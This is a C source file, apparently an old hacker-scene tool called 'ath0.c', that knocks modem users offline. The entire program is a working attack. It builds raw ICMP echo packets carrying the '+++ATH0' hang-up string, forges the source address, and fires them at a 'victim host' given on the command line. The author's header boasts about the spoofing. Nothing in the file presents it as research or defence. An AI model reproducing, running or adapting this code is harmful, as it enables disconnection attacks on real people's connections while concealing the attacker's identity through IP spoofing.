/* 
 * ath0.c
 * Modem disconnector
 *
 * Author: NeVErMinD 
 *         gngs@mega.ist.utl.pt
 *
 * Greets To: Susana(my love), DrBrain, paran0id, BeBe, FractalG, its1,
 *            #torres_de_ervas
 *            
 *            
 * Few words: All this could be done with a simple system() call, but
 *            this way we can spoof your host! You are going to see the
 *            code right? ;)
 *
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netdb.h>
#include <errno.h>
#define  NUM  3 /* npackets by default */

void usage( char *name )
  { 
   printf( "\nusage: %s <source host> <victim host> [npackets]\n\n",name);
   printf( "Made By NeVErMinD\n");
   exit( 0 );
  }

// procedure taken from stream.c
inline u_short in_cksum(u_short *addr, int len)
    {
        register int nleft = len;
        register u_short *w = addr;
        register int sum = 0;
        u_short answer = 0;


         while (nleft > 1)  {
             sum += *w++;
             nleft -= 2;
         }

         /* mop up an odd byte, if necessary */
         if (nleft == 1) {
             *(u_char *)(&answer) = *(u_char *) w;
             sum += answer;
         }

         /* add back carry outs from top 16 bits to low 16 bits */
         sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
         sum += (sum >> 16);            /* add carry */
         answer = ~sum;                 /* truncate to 16 bits */
         return(answer);
    }


struct hostent *resolv ( char *host)
{ 
 struct hostent *hp;
 
 if( ( hp = gethostbyname( host ) ) == NULL )
          {
            perror("gethostbyname()"); /* lame msgs, i know */
            exit( -1 );
          }
  return(hp);
}    

void attack( int sockid, struct sockaddr_in sin, struct sockaddr_in din,
char *arg, int npackets )
  {
     char *packet;
     int psize,i;
     char *data ="+++ATH0\r";
     struct iphdr *ip;
     size_t iplen = sizeof( struct iphdr );
     struct icmphdr *icmp;
     size_t icmplen = sizeof( struct icmphdr );
     int length = strlen( data );

     packet = ( char * )malloc( iplen + icmplen + length );

     ip = ( struct iphdr * )packet;
     icmp = ( struct icmphdr * )( packet + iplen );

     bcopy( data ,(packet+iplen+icmplen) ,  length);

     ip->ihl = 5;
     ip->tos = 0;
     ip->version = 4;
     ip->ttl = 255;
     ip->protocol = IPPROTO_ICMP;
     ip->saddr = sin.sin_addr.s_addr;
     ip->daddr = din.sin_addr.s_addr;
     ip->tot_len = htons( iplen + icmplen +  length  );
     ip->check = in_cksum( ( u_short * )ip, iplen );

     icmp->type = ICMP_ECHO;
     icmp->code = 0;
     icmp->checksum =in_cksum( ( u_short * )icmp,(icmplen + length ));

     psize = ( iplen + icmplen + length  );

        for( i = 0; i < npackets;  )
          {
            if ((sendto( sockid, packet, psize, 0,
              ( struct sockaddr * )&din, sizeof( struct sockaddr ) ))< 0 )
                 {    
                  perror("sendto()");
                  exit( -1 );
                 }
            printf("%s being attack %d times\n", arg,++i);
          }


     free( packet );
}


int main( int argc, char *argv[] )
    {  
     struct sockaddr_in sin, din;
     struct hostent *sourcehost, *desthost;
     int sockid,npackets;

     if (argc<3) usage(argv[0]);

     if (argv[3]==NULL)
            npackets = NUM;
      else
          npackets = ( atoi( argv[3] ) );
        
    sourcehost = resolv (argv[1]);
    bcopy( sourcehost->h_addr, &sin.sin_addr, sourcehost->h_length );

    desthost = resolv (argv[2]);
    bcopy( desthost->h_addr, &din.sin_addr, desthost->h_length );
    din.sin_family = AF_INET;

     if( ( sockid = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1 )
          {
            perror("socket()");
             exit( -1 );
          }
           attack( sockid, sin, din, argv[2], npackets );
                      
     return 0;
     }